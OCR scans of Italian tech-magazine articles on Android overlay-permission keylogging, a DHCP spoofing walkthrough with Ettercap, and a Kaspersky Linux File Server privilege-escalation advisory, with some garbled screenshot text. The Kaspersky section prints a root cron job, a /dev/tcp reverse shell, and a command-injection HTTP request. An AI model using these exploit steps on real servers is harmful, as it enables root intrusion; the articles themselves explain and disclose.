faccia nulla di speciale, ma che faccia comparire 
sopra all’interfaccia di altre app una tastiera nume- 
rica gigante semitrasparente, per aiutare gli utenti a 
digitare il pin di una carta di credito, visto che con 
la piccola tastiera virtuale predefinita di Android al- 
cune persone potrebbero avere difficoltà. Oppure, 
si può semplicemente far comparire per qualche 
secondo a tutto schermo il numero o la lettera che è 
appena stato digitato sulla normale taStiera, così si 
ha una conferma di ciò che si sta scrivendo. Come 
qualcuno avrà sicuramente già intuito, questo si- 
gnifica che sfruttando questo livello trasparente in 
sovraimpressione, un'applicazione “cattiva” può 


interferire con altre applicazioni “buone” leggendo 
i dati che l’utente inserisce e magari, oltre a realiz- 
zare davverò un servizio come la visualizzazione 
a tutto schermo, può poi ovviamente tenere per sé 
stessa quei dati e magari mandarli al suo produtto- 
re. Insomma, si tratta di un perfetto keylogger: un 
utente ignaro installa un'applicazione senza render- 
si conto di avere accettato (tra gli altri) questo parti- 
colare permesso. Sfruttandolo, l’applicazione crea 
un proprio livello trasparente sopra a tutte le altre 


app, così quando l’utente apre l’app di PayPal ed 
inserisce la propria password, l’app ‘cattiva’ riesce 
ad intercettare i tasti premuti dall’utente e quindi a 
scoprire la password. A quel punto, l’app malevola 
non deve far altro che inviare al proprio autore la 
password PayPal dell’utente, e questi potrà svuo- 
tare il conto della vittima. Altri permessi di acces- 
sibilità offrono ulteriori strumenti ai pirati, perché 
permettono di ottenere un vero e proprio controllo 
su altre app, e addirittura su Google Play (quindi 


“I permessi li decido io!” 


Codice a barre e QR Scanner 


‘richiede l'accesso a 


Cronologia app e dispositivo 

Contatti 

Foto/elementi multimediali/file 
Fotocamera 

Informazioni sulla connessione Wi-Fi 


ID dispositivo e dati sulle chiamate 


ACCETTO 


PERMESSI ORIGINALI 


Barcode Scanner 
tool.canner.grscan.barcodescan 


Gestione file 
comrhmaottim 


GPS Test 
com.charteross gpstest 


OBD Car Doctor free 
com.pan.obdcardoctor 


Fogli 


la possibilità di rimuovere od installare applicazio- 
ni a proprio piacere). E tutto questo può avvenire 
sul dispositivo di un utente che ha installato l’ap- 
plicazione malevola con i permessi di accessibilità 
senza nemmeno averne davvero bisogno, perché 
magari l’utente non ha alcun disturbo ai sensi, sol- 
tanto perché nella fretta non si è preso due secondi 
per leggere l'elenco dei permessi richiesti dall’app 
e domandarsi se davvero tutte quelle autorizzazioni 
fossero necessarie per quella app. 


Ecco come tenere a bada ogni app installata sul tuo smartphone 


com.googie.android.apps.does.editors.sheete 


Popular Science Italia 


it popularscienceita popularscienceità 


Please Input a Keyword 


IL NOME DELL’APP 


Quando cerchiamo un'app su Google Play, prima di in- 

stallarla ci vengono indicati i vari permessi richiesti. 
Possiamo accorgerci che qualche permesso richiesto non è davvero 
necessario all'utilizzo ma installare l'app comunque. L'importante è 
non eseguirla subito dopo l'installazione. 


MANIFEST 


x andcil permission REXD.PHONE.STATE 
Comnente al'anpicaone di case ae va tlrliche dh dios Questa suavizzanone cometa applicazione di determinare rumera di elicoa e qb 1Ò dr depunbri, 3e ina 
chamata è tiva 0. moto memo Cameo da Une chesta 


Fotocamera 


acquisizione di foto e video 
W' ancboid penninsica CAMERA 


Cuamwenie llaspheazione di scattate foto è nprondere nda cai a (ociumera. Questa aviazione compente ul'apibcazione di vzzare lo toc mero qualbti marvrto vena la tva cotrira. Ii 


Tue informazioni sociali 
lettura contatti personali 
X anroldpermissiza RED, CONTACT 


Consente ail'azpiicazione Gi Megane dati ela i fut CUR Nwimirizzati di aldo Assia la ivqueza C 00 CLI Pai eletto chsamane, ato mosad o COMUCANO m avi mai (On meme 
specifici Questa autorizzazione Compente Abe APpleRzoni di Zalvare dali dei topi contati e applicnziani dannose ptrebatre consmdee i dati dei contata tua imaputa. 


Segnalibri e cronologia 
lettura segnalibri e cronologia web Da) 
X comandridironcer permiszion END, MSTORYHOONMARKS 
ve eremo Si A UL ce ros dò itato 05 10 econli del amener fta  poeSe che esta tria ine n in ambo arr 


Save & Re-Instali Close 


sa ru (Tro - —— 
TOGLIERE LA SPUNTA 
Per ogni applicazione sono disponibili 3 schede: una 
per modificare i permessi, un'altra per modificare la 
grafica, ed un'ultima per modificare manualmente il manifest 
dell'app. Nella scheda Permission basta togliere la spunta a tutti i 
permessi che non vogliamo concedere per rimuoverli. 


Immediatamente dopo avere installato l’app, possiamo 

aprire Advanced Permission Manager. Nella lista AU 
Apps, disponibile dal menu principale di APM, dobbiamo cercare 
l'applicazione appena installata. Basta toccare il suo nome per co- 
minciare a modificarla. 


Re-installation needed. i 
Please first uninstall the old app by click Uninstall, and then re-install it by click Install. | 


Uninstall 


SALVA E REINSTALLA 
0 Modificati i permessi, bisogna premere Save&Re-In- 
stall. Dopo qualche minuto, appaiono i tre pulsanti per 
la reinstallazione: prima si preme Uninstall, e poi Install, così le 
versione originale viene sostituita con quella da noi modificata. Se 
abbiamo sbagliato, possiamo sempre ripetere la procedura. 
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9 assegnazione degli indirizzi IP ai client in una 
rete locale, e la relativa navigazione in Internet, 
nella grande maggioranza dei casi (ad esempio 
in reti domestiche) viene oggi ottenuta senza 

“sporcarsi” le mani con configurazioni comprensibili solo ai 
più esperti. Pensiamo per un attimo alle azioni che compiamo 
in una rete cablata: accendiamo il router, avviamo il PC e al 
termine del boot, dopo il login, ecco che siamo pronti per 
lanciare un browser, scaricare la posta elettronica o effettuare 
video-telefonate con il nostro software preferito. Questa facilità 
di connessione con totale assenza di configurazione è dovuta al 
sistema operativo che, appena avvia l’interfaccia di rete, inizia 
una “transazione” con il router al termine della quale si vede 
assegnare un indirizzo IP. La magia, se così possiamo chiamarla, 
avviene grazie ad un protocollo di rete. 


AUTOMATISMI IN LAN 


Creato dal gruppo Dynamic Host Configuration Working 
Group associati all’Internet Engineering Task Force (IETF — 
www.ietf.org) il DHCP, acronimo di Dynamic Configuration 
Host Protocol, è un protocollo di rete del livello Applicazione 
- (livello 7 dello stack ISO/OSI, alla stregua di HTTP e FTP) 
un’evoluzione del BOOTP (BOOTstrap Protocol), usato 
generalmente per la configurazione dinamica degli host con 
intervento pressoché nullo ad opera dell’utente, almeno in 
determinate condizioni, rendendo così la gestione della rete 
semplice e veloce. Basato su architettura client-server, il server 
DHCP può comunicare ai client non solo l’indirizzo IP da 
associare all’interfaccia di rete, anche la maschera di rete, l'IP 
del gateway e l’indirizzo dei server DNS. La configurazione di 
un server DHCP, ad esempio utilizzando GNU/Linux, esula da 
questo contesto poiché daremo per scontato la sua presenza nel 
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ATTACCO DHCP: 
IL PROTOCOLLO 
NON È SICURO 


Come funziona l'assegnazione automatica 
di un indirizzo IP e quali sono le possibili 
problematiche di sicurezza? Scopriamolo subito 


Michele Petrecca 


router in uso. Poiché la principale funzione, almeno la più usata, 
è l’assegnazione di un indirizzo IP a un client che ne fa richiesta, 
il DHCP permette 3 possibili modalità di assegnazione: statica, 
automatica e dinamica. Nella modalità statica, l'amministratore 
di rete associa, previa configurazione, un indirizzo ad una data 
macchina sulla base del MAC address della sua scheda di rete: 
si avrà quindi un’associazione univoca MAC address/IP per 
ogni macchina. La modalità automatica, utilizzata in ambiente 
“domestico”, assegna in maniera permanente un indirizzo IP al 
PC che ne fa richiesta senza che l’utente debba metter mano 
alla configurazione. Abbiamo scelto la parola permanente 
perché l’ultima modalità, la dinamica, prevede un tempo 
di assegnazione (lease) scaduto il quale, se il client non ha 
contrattato il rinnovo, l’assegnazione viene cancellata. Questo 


SEPARATE IN CASA 
Suddivisione in sotto-reti 


Non è una buona idea avere due server DHCP sulla stessa 
rete poiché entrerebbero in conflitto di attribuzione. Ab- 
biamo però scoperto come sia praticamente possibile e 
senza alcun problema. A titolo informativo facciamo pre- 
sente, però, che più server DHCP potrebbero essere uti- 
lizzati - in sostituzione dei costosi Switch VLAN Managed 
- per suddividere una rete in confini logici tali da definire 
delle sotto-reti ognuna delle quali potrebbe corrispondere 
ad un dato reparto aziendale (contabilità, manutenzione, 
ecc.). In questi casi è presente un altro elementò, il DHCP 
Relay, un computer o un router, il cui scopo è inoltrare le 
richieste al server DHCP qualora questo non fosse nella 
sotto-rete interessata dalle richieste. 


Fig. 1 * Diagramma temporale del protocollo DHCP 


modo di procedere permette di assegnare indirizzi ad ogni 
macchina che si vuole collegare in rete, indirizzo che ritornerà 
disponibile ad altre macchine se il tempo di lease è scaduto o 
se è stato deliberatamente rilasciato in seguito a disconnessione 
del client. In Fig. 1 è illustrata la sequenza di transazioni tra 
client e server. 

Il protocollo DHCP prevede che sia sempre il client a contattare 
il server. Con riferimento alla Fig. 1, al tempo 0 il sistema 
operativo del client attiva l’interfaccia di rete. A questo punto 
il client DHCP (pump o dhclient su GNU/Linux), al fine di 
individuare un server DHCP, invia al tempo T1 un messaggio 
DHCPDISCOVER in broadcast su UDP (User Datagram 
Protocol) con destinazione 255.255.255.255 su porta 67 
mentre la sorgente (client) avrà indirizzo 0.0.0.0 dalla porta 
68. Ora, prima di procedere nella descrizione, occorre qualche 
spiegazione. Una (apparente) incongruenza è l’uso di UDP: 
poiché esso presuppone IP, come si fa ad utilizzare UDP se la 
macchina client ancora non ha un IP? Nel formato del messaggio 
DHCP oltre a sorgente e destinazione è incluso il MAC address 
— indirizzo fisico univoco della scheda di rete - del richiedente, 
questo affinché sia univocamente identificato dal server DHCP. 
Perché il client trasmette con indirizzo 0.0.0.0? In genere, viene 
mostrato questo indirizzo quando il dispositivo non è connesso 
ad una rete TCP/IP. i 

Nel caso in questione l’indirizzo 0.0.0.0 indica un errore di 


assegnazione dell’indirizzo IP e, quando impostato a questo 
valore, il dispositivo non è in grado di comunicare con altri 
dispositivi in rete. Il protocollo prevede questo come indirizzo 
iniziale: nel momento in cui la transazione va a buon fine 
viene assunto l’IP assegnato in luogo di 0.0.0.0. Ultima nota, 
l’indirizzo 255.255.255.255 come destinazione: nel caso 
specifico indica tutti i nodi raggiungibili nella sotto-rete nella 
quale ci si trova. Il secondo step, al tempo T2, vede la risposta del 
(o dei) server DHCP con il messaggio DHCPOFFER nel quale 
è presente l’indirizzo IP offerto al client. AI tempo T3 il client 
risponde in broadcast con un messaggio DHCPREQUEST, 
indicando che ha accettato un IP. Il client accetta la prima 
offerta che gli arriva e, nel caso di configurazione dinamica, la 
selezione generalmente prevede la risposta al DHCPOFFER con 
il maggior valore del tempo di lease. 

Gli altri server ritirano la propria offerta e al tempo T4 il 
server interessato risponde con un messaggio DHCPACK: 
alla ricezione di questo messaggio il client completa la sua 
configurazione. Poiché tra la richiesta e le risposte passa un po’ 
di tempo (a breve lo quantificheremo) nel frattempo potrebbe 
darsi che quel dato indirizzo sia stato assegnato ad un altro client 
a causa di un’altra transazione: in questo caso il server risponde 
con un messaggio DHCPNAK e il client vedendosi negare la 
richiesta dovrà ripartire da un messaggio di DHCPDISCOVER. 
Il messaggio DACPRELEASE al tempo Tn indica che il client 
vuole disconnettersi, pertanto non necessità più di quell’indirizzo 
rendendolo di fatto disponibile per un altro client. 

Per ricordare la sequenza di messaggi è sufficiente associarla 
al nome proprio di persona DORA. Il DHCP prevede una 
comunicazione non occasionale tra il client, che resta attivo 
anche dopo l’assegnazione dell’IP, e il server. Il rinnovo, in caso 
di scadenza del tempo di lease, avviene via UDP in unicast. 


192.168.0.10 


RaspBerry PI 
192.168.0.2 


Fig. 2 e Topologia della rete di prova 
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UNA DEBOLEZZA INTRINSECA Ki 
Ora sappiamo come interagiscono tra di loro PC e router per I0 SI, TU NO! 


l’assegnazione di un indirizzo IP all’interfaccia di rete. Sembra tutto Mitigare il DHCP Spoofing 


ben studiato e funzionante e in effetti è così, ma non è tutto oro quel 


che luccica! Fino ad ora non abbiamo notato, ad esempio, la mancanza In uno scenario di server DHCP multipli, ad esempio 
di una particolare procedura? 2, in genere uno di questi è un falso poiché la buo- 
Ebbene sì, all’utente che vuole ottenere un IP, nel protocollo DHCP na amministrazione delle reti evita conflitti di questo 
non è prevista la richiesta delle credenziali. In sostanza, non è previsto tipo. Il client, però, non ha alcun elemento per rico- 
alcun meccanismo di verifica e autenticazione delle richieste di noscere quale sia quello falso. Lo snooping è una tec- 
assegnazione di un indirizzo IP. nologia operante al livello 2 (Datalink) della pila IS0/ 
Questa modalità su “base fiduciaria” lo espone inevitabilmente a OSI e introdotta al livello di sistema operativo dello 
problemi di sicurezza. Ad esempio, un attacco immediato a cui si switch di rete: l'obiettivo è prevenire offerte non au- 
potrebbe subito pensare è il classico DoS (Denial of Service) ovvero torizzate. II DHCP Snooping rigetterà tutti i messaggi 
un'interruzione di servizio (a scopo dimostrativo, per puro vandalismo da server DHCP non attendibili, da MAC address non 
o solo per divertimento) ad opera di un utente che ha accesso alla rete corrispondenti nonché DHCPRELEASE se diversi dal- 
con DHCP abilitato. la conversazione originale. L'attendibilità è ottenuta 
In questi casi l’utente malizioso, grazie all’uso di appositi software tramite specifica negoziazione. 


come Yersinia (www.yersinia.net), effettua un elevato numero di 

richieste DHCPDISCOVER, qualcosa come alcune migliaia al 

secondo! Va da sé che operando in questo modo il router, fin da subito, 

non sarà più in grado di assegnare un IP a un client che ne fa richiesta. DHCP - appare evidente come gli sia più facile intercettare/diffondere 
Questo tipo di attacco è noto anche come DHCP Starvation. Altro qualsiasi tipo di informazione e/o effettuare qualsiasi altro tipo di 
problema legato a DHCP è quello della possibile contraffazione attacco. 

(spoofing) del server dirottando in questo modo i client verso una 

macchina con funzioni da falso (rogue) DHCP server. L'obiettivo 

dell’attacco è sostituirsi all’effettivo server DHCP presente nella LAN IL DHCP SPOOFING 

vincendo così la “gara di assegnazione” dell’indirizzo IP al client L’attacco consiste in una sorta di gara di velocità con il vero server 
appena connesso che ne fa richiesta. In questo modo si dirottano tutte _—DHCP.La rete di test utilizzata è visibile in Fig. 2: nulla di particolare, 
le connessioni verso il gateway a passare attraverso la macchina che ha probabilmente corrisponde alla maggior parte delle reti domestiche. 
le funzioni di falso server DHCP. Gli indirizzi presenti vengono assegnati, con le modalità riportate 
Il motivo è scontato: fare sniffing dei dati. Allora se l'attaccante riesce in precedenza, dal vero server DHCP per la RaspBerry Pi, mentre 
ad impersonare un elemento della rete — nello specifico di un server dall’operazione di spoofing per gli altri due client. Chi volesse 


ettercap 0.8.1] 
Start Targets Hosts View _Mitm Filters Logging Plugins Info Connection Details 


Connections * | Layer 2 Information: 


i LS TUA è. ci RR n 


| Host filter — Protocol file ;Connection state fi Source MAC address: 50:46:5D:B7:7BA1 


til | / (O tcp sfuDP Qother! | Active Sidle Destination MAC address: FF.FF.FE:FF:FF.FF 
Mast ‘sar «hBorti E Host Port Proto State Ti Layer3 Information: i î 
192.168.0.2 ‘0123 - 2124514488 123 UDP ide 816 9urcelPaddress: URGE | 


192.168.0.2 123 - 212.45.14416 123 UDP idle 768 


Destination IP address: 255.255.255.255 


192.168.0.1 67 - 255255255255 68 UDP ide 548 Layerdinformation: | 
192.168.0.2 67 - 255255255255 68 UDP idle 162 Protocol: UDP | 


|| fe80:52465dfffeb77bal 5353 - ff02-fb 5353 UDP active 194 Source port 68 dhcpelient 
View Details Kill Connection PEStngRoA Rort A ai 
| rr] uu 1 o Transfemedbytes 900 


Unified sniffing already started... 
DHCP: [50:46:5D:B7:7B:A1] REQUEST 192.168.0.10 

DHCP spoofing: fake ACK [50:46:5D:B7:7B:A1] assigned to 192.168.0.10 

DHCP: [192.168.0.2] ACK : 192.168.0.10 255.255.255.0 GW 192.168.0.2 DNS 192.168.0.1 


Fig. 3 * Nella finestra Connection Details la richiesta DHCPDISCOVER 
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D *eth0 [Wireshark 2.2.7 (wireshark- 


File Edit View Go 


©©d4Amgdi BEXG 


Capture Analyze Statistics 


Telephony Tools 


Filter: | bootp Ilarp 


No. Time 


MU ULIUSLIS 


0.031883048 
0.032454202 
0.047775495 
0.534341314 
4,536152083 
4.547187394 
4.809577162 


Source 
IIZ3IDO.U72 


Netgear_b3:ba:4e 


‘ 192,168.0.2 


192.168.0.1 
0.0.0.0 
192,168.0.2 
AsustekC_b7:7b:al 


Destination 
ZII :4293:22393: 4395 — 


255,255.255.255 
Broadcast 
255.255,255.255 
192.168.0.3 
255.255.255.255 
255.255.255.255 
Broadcast 


4.809855659 Netgear_b3:ba:4e 
ono Era CRE S 7 
Ethernet II, Src: AsustekC_| TT 

» Internet Protocol Version 4, Src: 0.0.0.0, Dst: 255.255.255.255 

» User Datagram Protocol, Src Port: 68, Dst Port: 67 

v Bootstrap Protocol (Discover) 

Message type: Boot Request (1) 
Hardware type: Ethernet (0x01) 
Hardware address length: 6 
Hops: 0 
Transaction ID: 0x88a9d74d 
Seconds elapsed: 0 

» Bootp flags: 0x0000 (Unicast) 


Intemals Help 


< ER 0e005 è 6 


> Expression... 


"unur 


AsustekC_b7:7b:al ARP 


Clear Apply Salva 


Protocol Length Info 
© CDSZO HU AUN> © T/ITBNSAULION IU UXGUISTÀZE 


2 DHCP Discover - Transaction ID 0x88a9d74d 
Who has 192.168.0.3? Tell 192.168.0.1 
DHCP Offer - Transaction ID 0x88a9d74d 
DHCP Offer - Transaction ID 0x88a9d74d 
DHCP Request - Transaction ID 0x88a9d74d 
DHCP _ACK - Transaction ID 0x88a9d74d 
Who has 192.168.0.1? Tell 192.168.0.10. 
192.168.0.1 is at 10:da:43:b3:ba:4e 


ARP 
DHCP 
DHCP 
DHCP 
DHCP 
ARP 


:al), Dst: Broadcast (ff:ff:ff:ff:ff:ff) 


Fig. 4 * Sequenza richieste DHCP e ARP dopo il collegamento del cavo 


riprodurre il nostro test dovrà tener conto degli indirizzi IP differenti 
assegnati dal proprio router, a meno di volerli impostare staticamente. 
Il nostro sistema attaccante sarà la RaspBerry Pi, che entrerà in corsa 
con il reale server DHCP del router previo uso di Ettercap (che 
effettuerà il DHCP spoofing), mentre per il monitoraggio utilizzeremo 
Wireshark, software già noti ai più informati. 

Poiché dovremo simulare la connessione di uno o più client, 
assicuriamoci che il cavo di rete sia scollegato dal client (o dai client) 
che vorremo utilizzare per la prova. Sulla RaspBerry Pi avviamo 
Ettercap in modalità grafica. Clicchiamo su Sniff e optiamo per 
Unified sniffing: nella pop-up a comparsa scegliamo ettercap input 
e dal menu a tendina Network interface selezioniamo l’interfaccia di 
rete (in genere eth0). Confermiamo con OK. 

A questo punto i menu in alto cambieranno: clicchiamo su Mitm, 
scegliamo DHCP Spoofing e nella nuova pop-up, optiamo per MITM 
Attack: DHCP Spoofing. In IP Pool (optional) riporteremo un range 
di indirizzi, facendo attenzione a non assegnarne di già usati. Nel 
nostro caso abbiamo riportato 192.168.0.10-20, ovvero il falso server 
DHCP utilizzerà in sequenza gli indirizzi compresi tra 192.168.0.10 e 
192.168.0.20. In Netmask digitiamo l’indirizzo 255.255.255.0 e infine 
in DNS Server IP l’indirizzo del router (192.168.0.1, nella nostra 
prova). Confermiamo con OK. 


ATTACCO RIUSCITO! 


Lanciamo Wireshark dalla stessa RaspBerry Pi o dal client a cui 
dovremo collegare il cavo Ethernet. Con riferimento all’interfaccia 
in GTK all’apertura, nella sezione Capture, clicchiamo su Interface 
List: dalla pop-up a comparsa, Wireshark: Capture Interfaces, 
selezioniamo l’interfaccia di rete (tipicamente eth0, ma se su un clientsi 


utilizza la distribuzione Fedora potrebbe essere anche enp3s0), quindi 
confermiamo con Start per avviare la cattura dei dati. Spostiamoci su 
Ettercap e dal menu Start scegliamo Start sniffing. Siamo arrivati al 
punto in cui Wireshark è pronto a catturare i dati e Ettercap è pronto a 
rispondere e fornire messaggi di tipo fake DHCP. 

Colleghiamo il cavo di rete del client allo switch e vediamo cosa 
succede in entrambi i programmi. In Wireshark (Fig. 4), al fine di 
smaltire dati di non interesse, in Filter digitiamo il filtro bootp || arp. 
Nel rigo evidenziato inizia la transazione con un DACPDISCOVER: 
ciò avviene al tempo (seconda colonna) 0,031883048 (la risoluzione si 
spinge fino al nanosecondo!). Circa 0,6ms dopo il router, un Netgear 
DGN2200, poiché ha assegnato l’IP 192.168.0.2 alla RaspBerry Pi 
chiede, in broadcast, chi ha l'IP 192.168.0.3; non ricevendo risposta 
parte la sua richiesta DHCPOFFER al tempo 0,534341314, ma prima 
di lui interviene Ettercap che invia al tempo 0,047775495 la propria 
offerta DHCPOFFER per l’IP 192.168.0.10, visibile in basso in Fig. 
3 alla riga DHCP Spoofing: fake OFFER offering 192.168.0.10. Il 
client risponde con un DACPREQUEST e ancora una volta Ettercap 
risponde (notiamo nella colonna Source l’indirizzo 192.168.0.2 della 
RaspBerry Pi) assegnandogli il suddetto IP con un DHCPACK al 
tempo 4,547187394, naturalmente un fake ACK come da Fig. 3! 
Tutto qui, l’attacco è andato a buon fine e per rendercene conto è 
sufficiente impartire ifconfig sul client per assicurarsi che l’indirizzo 
assegnato non è quello offerto dal router attraverso il suo server DHCP 
(192.168.0.3) ma quello offerto dall’attaccante (falso server DHCP). 
A questo punto tutto il traffico tra l'esterno e il client passa per Ettercap 
ovvero per la RaspBerry Pi che gli fa da gateway, ed è quindi facilmente 
catturabile e visibile. Il discorso può apparire un po” articolato: ad ogni 
modo in caso di problemi e/o richieste è possibile rivolgersi al forum di 
Linux Magazine (http://linux-magazine.edmaster.it/forum/). 
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HACKING ZONE 


Ogni mese 
l’analisi 
dettagliata 

delle vulnerabilità 
più pericolose 

e le soluzioni 

più adatte 

per risolvere 

il problema 


Una quarantena pericolosa 


La funzione di quarantena dell'antivirus Kaspersky Linux File Server contiene un pericoloso 
bug che consente ad un utente malintenzionato l'accesso ad un terminale remoto 


on l'aumento dell’informatizzazione 

molte aziende, e persino istituti pub- 

blici (come scuole o amministrazioni 
locali), stanno cominciando a memorizzare 
dati importanti in server centralizzati, così 
tutti gli utenti autorizzati possono acceder- 
vi da qualsiasi dispositivo. Tuttavia, c'è un 
ovvio problema: la diffusione dei virus. Faci- 
litare la condivisione di file con altri colleghi 
comporta inevitabilmente la possibilità di 
diffondere malware di vario tipo. Soprattut- 
to in un Paese come il nostro, nel quale gli 
attacchi con allegati delle e-mail sono an- 
cora molto diffusi, probabilmente a causa 
di una generale mancanza di formazione 
informatica degli utenti. Per risolvere questo 
problema, sono stati inventati gli antivirus 
server, che si occupano di controllare tutti 
i file che vengono memorizzati sul server e 
che pertanto hanno una comoda interfaccia 
di accesso web per consentirne l’ammini- 
strazione ai tecnici (visto che i server non 
hanno un ambiente grafico, ed un accesso 
SSH potrebbe essere scomodo per gestire 
le molte opzioni). Questi antivirus risolvono 
il problema in modo brillante, contenendo 
anche l'epidemia: se una volta con una pen- 
drive infettata si potevano colpire decine di 
computer, ora basta caricare il file sul server 
e, se è infetto, verrà bloccato impedendo ad 
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altri utenti l’accesso al malware. Questo non 
significa che gli antivirus server siano la per- 
fezione: sono anch’essi programmi, e come 
tutti i software possono contenere dei bug 
che li rendono pericolo. In questa rubrica di 
Linux Magazine ci siamo spesso occupati 
dei bug all’interno degli antivirus, perché 
quando un pericolo per il proprio sistema 
operativo proviene proprio da un software 
progettato per proteggerlo, bisogna presta- 
re molta più attenzione del solito. È infatti 
facile che in casi come questi si finisca per 
sottovalutare il problema, dando per scon- 
tato che l'antivirus risolva qualsiasi cosa: un 
bravo amministratore non può fidarsi cie- 
camente degli antimalware, ed assicurarsi 
sempre che non siano proprio loro a creare 
delle vulnerabilità. 


SHELL DI ROOT CON 
UN PAIO DI COMANDI 


Tra i vari antivirus server in commercio, uno 
dei più diffusi è quello prodotto da Kasper- 
sky. Questo antivirus permette, tra le al- 
tre funzioni, l’uso della quarantena. È una 
funzione che hanno un po’ tutti i principali 
software di questo genere e si basa fonda- 
mentalmente sull'idea di spostare un file in 
una “zona sicura” per cercare di rimuovere il 


malware senza perdere il file vero e proprio 
(magari un documento). Invece di cancella- 
re il documento infettato, lo si tiene per un 
certo periodo memorizzato in un formato bi- 
nario che non permette l'esecuzione del file, 
ma solo la lettura del suo codice. Così se si 
trova una soluzione, si può analizzare il file 
e rimuovere le parti relative al malware, ot- 
tenendo poi il documento originale “pulito”. 
Nell’antivirus server di Kaspersky questo 
lavoro viene svolto dal programma kav4fs- 
control. Il problema è che quando si svolge 
questa operazione, il software (che normal- 
mente funziona con l’utente kluser) ottiene 
i privilegi di amministrazione. Si tratta sem- 
pre di qualcosa di pericoloso, soprattutto 
se come in questo caso il programma non 
controlla i comandi che riceve. Gli esperti 
di sicurezza del team Core Security han- 
no scoperto che per un utente semplice è 


I Fig. 1 L'interfaccia web dell’antivirus 
con la funzione per la quarantena 


possibile sfruttare questo mancato controllo 
per ottenere i privilegi di root tramite il mec- 
canismo della quarantena. Prima di tutto il 
malintenzionato deve creare un file di tipo 
cronjob con un comando del tipo: 


echo "* * * * * root /tmp/reverse.sh".> 


/tmp/baderon 


Questo permetterà l'esecuzione di uno 
script shell con i privilegi di root. Ovviamen- 
te si deve poi scrivere il file, che potrebbe 
essere qualsiasi cosa. Anche l’avvio di un 
terminale Bash su una connessione TCP: 
cat > /tmp/reverse.sh << EOF ‘ 
#!/bin/bash 


bash -i >& /dev/tcp/172.16.76.1/8000 0>&1 
EOF 


In questo modo il pirata può ottenere un 
terminale remoto con privilegi di root sul 
sistema. Ovviamente lo script deve essere 
eseguibile: 


% 


chmod: +x /tmp/reverse.sh 


Utilizzando l'opzione -Q dell’antivirus è pos- 
sibile per un utente semplice spostare il file 
cronjob in quarantena: 


QUARANTINE ID=$ (/opt/kaspersky/kav4£s 
*/bin/kav4fs-control -Ql 


--add-object /tmp/badcron | cut -d'=' 
-f2 | cut -d'.' -f1) 


Il comando restituisce l'ID del file in quaran- 
tena, grazie al quale sarà poi possibile ripri- 
stinarlo. Per memorizzare questo ID in una 
variabile basta prendere il testo compreso 
tra i simboli = e . con il comando cut. 


/opt/kaspersky/kav4£s/bin/kav4fs-control 


-Q --restore SQUARANTINE_ID 
--file /etc/cron.d/implant 


Il malintenzionato può ora, sempre come 
utente semplice, spostare il file fuori dalla 
quarantena. Il problema è che mentre lo fa 
può decidere là posizione in cui vuole met- 
tere il file “ripristinato”. Il programma kav4fs- 
control, infatti, non verifica quale fosse la 
precedente posizione del file, ovvero quella 
del momento in cui è stata messo in qua- 
rantena: è l’utente ad indicare una posizio- 
ne qualsiasi. E, siccome questa operazione 
viene fatta con privilegi di root, è possibile 


per l’utente malintenzionato scegliere una 
posizione su cui normalmente non potreb- 
be scrivere, come la cartella /etc/cron.d/ 
implant. Inserendo qui il proprio cronjob, il 
pirata ne rende automatica l'esecuzione, e 
può quindi ottenere un terminale remoto sul 
sistema su cui è installato l'antivirus. 


UNA RICHIESTA HTTP 


Tutte le operazioni che abbiamo analizzato 
possono essere fatte da un utente semplice 
per ottenere privilegi di root, ma deve esse- 
re un utente con accesso al sistema. Quindi 
se non concediamo l’accesso ad utenti vari, 
ma soltanto ad una persona che si occu- 
pa di gestire il server, siamo più sicuri? No, 
perché c’è anche un’altra vulnerabilità. Un 
bug nella pagina cgictl dell'interfaccia web 
permette l'esecuzione di comandi a nome 
dell’utente che sta avviando l’antivirus. Ba- 
sta creare un piccolo array di elementi in 
questa forma: 


"notifier": 


{"Actions": [{"Command": 


"touch /tmp/pepperoni", "EventName": 22, 


"Enable": true, 


"_ VersionInfo": "1.0"}] 


E passarlo alla pagina, il comando touch / 
tmp/pepperoni verrà eseguito ed il file crea- 
to. Il comando viene eseguito come utente 
kluser, che è un utente semplice ma può 
comunque essere utilizzato per svolgere la 
procedura che abbiamo presentato per l’ot- 
tenimento di una terminale remoto di root. 
La richiesta HTTP, con l’array codificato, sa- 
rebbe qualcosa del genere: 


POST /cgi-bin/ 
cgictl?action=setTaskSettings HTTP/1.1 

Host: <server IP>:9080 

User-Agent: Mozilla/5.0 (X11; Ubuntu; 

Linux x86_64; rv:52:0) Gecko/20100101 

Firefox/52.0 

Accept: application/json, text / 

javascript, */* 


ccept-Language: en-US,en;q=0.5 


Content-Type: application/x-www-form- 


urlencodedì 
Referer:,http://<server IP>:9080/ 
Content-Length: 3273 
Cookie: wmc_useWZRDods=true; 
DE0005C5625A420255EFEBB334 


" 


ume _logsSimpleMode=1; 


II Fig.2° La prima versione priva del bug 
è la 8.0.4.312 


1; wmc_iconsole lang=resource en.js; 
\ymc show settings descr=false; 
iconsole test; wmc_show licence_ 
descr=false 
Connection: close 
taskId=7& 


s22touch520 


s2Fpepperoni%22 
0 


&22EventName%22%3A%2 


22%20%20 


Il problema è che chiunque abbia accesso 
all’interfaccia web dell’antivirus può invia- 
re questa richeista HTTP, anche più volte 
(ogni volta esegue uno dei comandi che 
servono per ottenere il terminale di root). 
Quindi praticamente chiunque può sfrut- 
tare queste due vulnerabilità dell’antivirus 
per accedere da root al sistema operativo 
del server. 


LA SOLUZIONE 

Il bug è presente dalla versione 8.0.3.297 
alla 8.0.4.31 di Kaspersky Antivirus File 
Server: il problema non era troppo facile da 
risolvere, evidentemente, perché Kasper- 
sky ha impiegato ben 2 mesi per risolvere 
il problema dall’iniziale segnalazione (da 
parte di Core Security). Ovviamente, grazie 
all'accordo tra le due ditte, la vulnerabilità 
è diventata di dominio pubblico soltanto 
dopo la pubblicazione dell’aggiornamento 
che la corregge (https://support.kaspersky. 
com/13738/). Se il nostro antivirus è ag- 
giornato, quindi, è probabile che non vi sia 
alcun pericolo, perché prima questa vulne- 
rabilità era sconosciuta e nessuno potrebbe 
averla usata per accedere da remoto al no- 
stro sistema. Un buon modo per controllare 
gli accessi, comunque, è eseguire sul termi- 
nale ogni tanto il comando last, che indica le 
ultime sessioni SSH. 
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GOOGLE TI FA 
CHIAMARE GRATIS! 


Duo è l’app firmata Big G che ti consente di effettuare chiamate vocali 
e video senza spendere un centesimo. Ecco come installarla e usarla 


a maggior parte degli utenti ha sot- 
toscritto un piano con questo 0 
quell’operatore mobile che, il più delle 
volte, include minuti per chiamare in Italia 0 
all’estero. Ma se il nostro piano telefonico non 
include chiamate gratuite o se abbiamo finito 
